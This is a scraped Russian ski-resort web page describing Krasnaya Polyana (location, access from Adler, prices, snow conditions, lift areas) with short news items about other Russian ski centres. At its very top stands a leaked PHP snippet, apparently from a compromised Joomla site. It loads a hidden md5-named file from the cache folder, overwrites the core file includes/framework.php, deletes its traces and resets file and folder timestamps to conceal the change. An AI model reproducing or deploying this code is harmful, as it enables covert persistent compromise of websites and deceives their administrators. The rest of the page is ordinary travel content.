$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Красная поляна | горнолыжки
Баннер

Красная поляна

Описание

Обсудить на форуме...

Красная Поляна является самым сложным для лыж и сноуборда курортом в России и будет хозяином зимней Олимпиады 2014 года. Иногда называется "Русский Куршевель", этот курорт славится своими ухоженными трассами, качество катания, и чрезмерно высокими цен. Лифты быстрые и удобные, в очень хорошем состоянии, местный спасательный отряд считается лучшим в России, плюс много комфортабельный мини гостиницы в деревне и уютный бар.

Красная Поляна расположена всего в 45 км от Адлера (известного курорта, на берегу Черного моря), где находится недавно отреставрированный аэропорт и железнодорожный вокзал что делает его наиболее доступным горным курортом в Европейской части России. Перелет из Москвы занимает 2,5 часа, а трансфер до лыжной станции занимает 1,5 часа. Легкий доступ собирает сюда сотни горнолыжников Москвы, которые проводят выходные на Красной Поляне в течение сезона (середина декабря - начало марта).Местные жители очень дружелюбны и курорт является полностью безопасным.

Недостатком курорта являются его небольшие размеры и влажный климат (из-за близости к морю), а значит, однако есть вероятность найти мало снега на нижних склонах, работающих даже в январе. Всегда проверяйте уровень снега на курорте, прежде чем отправляться туда (их сайте как правило, имеет последнюю актуальную информацию). Цены на подъемники слишком высоки, и жилье стоит дороже, чем на других курортах России (хотя и дешевле, чем в Европе).

Однако, если вы хотите найти западные стандарты обслуживания, это лучшее место. Кроме того, Есть планы активного расширение, так что кто знает, может через несколько лет это место станет одним из самых больших курортов России.

Карты красной поляны смотрите во вкладках

- Альпика-Сервис, самый старый курорт Красной Поляны.

[Нажмите для увеличения]

- Газпром (он же "Лаура"), открывшийся в 2008 году.

[Нажмите для увеличения]

- Горная карусель, самый масштабный из проектов.

[Нажмите для увеличения]

- Роза Хутор, работающий в сезоне 2010-2011 в тестовом режие.

[Нажмите для увеличения]

 

Обсудить на форуме...

Коментарии:

 
.

Последние новости

Популярные статьи

Новости
Открытие сезона на ГЛЦ "Царевщина"

Ну вот и дождались любители горных лыж и сноуборда открытия ГЛЦ "Царевщина". Сегодня был полноценный рабочий день на этом комплексе. Снегу накидали достаточно, земли нигде не видно. В некоторых местах есть лёд. Народу немного, на подъёмнике очередей нет. Цены остались на уровне прошлого сезона: 1 смена с 10 до 15 - 600р, 2 смена с 13 до 17 - 700р, 3 смена с 17 до 21 - 300р (в выходные дни). В будние дни соответственно 250 - 300 - 200руб. Работает как всегда только центральная трасса.

 
Новости ГЛК Красная глинка

По заявлениям представителей ГЛК  Красная Глинка, что неподалёку от Самары, открытие намечено не 2 декабря, в настоящее время активно идёт подготовка склонов. На Юге убрали не работающий подъемник, трасса стала шире. Сейчас снежат Восточный склон. К открытию скорее всего будут работать Центр, Восток и если успеют то и Юг.

 
Появился новый раздел "Народный магазин"
Подробнее ...
Красная поляна | горнолыжки

Как доехать на машине
*От:
*До:
Дай +1 :)
Сохранить в моб...
Яндекс.Метрика